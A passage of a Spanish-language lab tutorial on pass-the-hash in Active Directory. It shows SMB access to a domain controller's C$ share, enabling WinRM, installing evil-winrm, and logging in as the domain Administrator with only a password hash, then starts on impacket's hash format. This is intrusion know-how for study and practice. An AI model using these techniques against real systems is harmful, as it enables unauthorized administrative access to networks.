Si queremos realizar lo mismo de antes, pero desde linux lo haremos con una herramienta que viene por defecto en kali, suponiendo que tenemos ya el hash del administrador o de cualquier tipo de usuario con el que queremos realizar ese pth, haremos lo siguiente:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Sat May 8 04:20:24 2021
Documents and Settings DHSrn 0 Sun Jan 5 05:22:02 2025
DumpStack.log.tmp AHS 12288 Tue Jan 21 03:14:12 2025
pagefile.sys AHS 536870912 Tue Jan 21 03:14:12 2025
PerfLogs D 0 Sat May 8 04:20:24 2021
Program Files DR 0 Sun Jan 5 05:28:08 2025
Program Files (x86) D 0 Sat May 8 05:39:35 2021
ProgramData DHn 0 Sat Jan 11 10:12:12 2025
Recovery DHSn 0 Sun Jan 5 05:22:02 2025
Shares D 0 Mon Jan 6 07:06:47 2025
System Volume Information DHS 0 Sun Jan 5 06:12:17 2025
Users DR 0 Sun Jan 5 05:28:05 2025
Windows D 0 Tue Jan 7 14:12:54 2025
15644159 blocks of size 4096. 12751911 blocks available
Vemos que hemos conseguido conectarnos al DC en el recurso compartido del C$ como el administrador por lo que tendriamos acceso al DC desde kali como el usuario Administrador del dominio.
Esto mismo tambien lo podemos realizar mediante el protocolo WinRM (Protocolo de gestion remota, que suele estar activo en casi todas las infraestructuras de empresas de Active Directory), para ello antes activaremos este mismo protocolo en nuestra maquina Windows para que este activo y configurado con un comando, por lo que nos iremos a nuestro WS01, abriremos una PowerShell como administrador local y ejecutaremos lo siguiente:
winrm quickconfig
Info:
WinRM no está configurado para recibir solicitudes en este equipo.
Se deben realizar estos cambios:
Inicie el servicio WinRM.
Establezca el tipo de servicio WinRM en inicio automático aplazado.
¿Desea realizar estos cambios [y/n]? y
WinRM se ha actualizado para recibir solicitudes.
Se cambió el tipo de servicio WinRM correctamente.
Servicio WinRM iniciado.
WinRM no está configurado para permitir acceso remoto al equipo para administración.
Se deben realizar estos cambios:
Habilitar la excepción de firewall WinRM.
¿Desea realizar estos cambios [y/n]? y
WinRM se actualizó para administración remota.
Excepción de firewall WinRM habilitada.
Y con esto ya tendriamos nuestro WinRM activado correctamente.
Ahora si nos vamos al kali y utilizamos una herramienta muy famosa llamada evil-winrm que no vendra por defecto en kali, podremos acceder de forma remota para gestionar un equipo mediante el protocolo evil-winrm, vamos a instalar la herramienta antes de todo.
sudo gem install evil-winrm
Y con esto ya tendriamos instalada la herramienta.
Vamos a probar a entrar en el equipo WS01 de forma remota como el usuario Administrador de la siguiente forma:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Y con esto veremos que funciona correctamente, por lo que nos podemos conectar a dicho equipo.
Pero como nosotros no tenemos la contraseña, solo tenemos el hash del Administrador podremos hacer un pth con winrm de la siguiente forma:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
corp\administrator
Y con esto veremos que con el hash tambien nos dejo entrar.
Con la herramienta impacket se puede hacer lo mismo, con el hash podremos autenticarnos como el administrador para realizar cosas como el mismo.
En este caso como tiene que tener un formato en concreto el hash pero el nuestro es un hash simple tendremos que rellenarlo con 32 ceros por delante y despues de los : poner el hash del administrador.